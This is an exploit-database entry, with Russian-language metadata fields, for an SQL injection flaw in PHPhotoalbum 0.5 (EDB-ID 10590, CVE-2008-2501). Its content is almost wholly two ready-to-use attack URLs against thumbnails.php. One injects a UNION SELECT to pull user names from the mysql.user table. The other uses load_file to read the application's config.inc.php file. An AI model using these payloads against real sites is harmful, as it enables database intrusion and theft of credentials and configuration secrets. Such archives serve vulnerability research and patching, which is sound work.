Exploit PHPhotoalbum 0.5 - SQL Injection

[Exploiter]

EDB-ID

10590

Проверка EDB

1. Пройдено

Автор

STACK

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-2501

Дата публикации

2009-12-21

# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--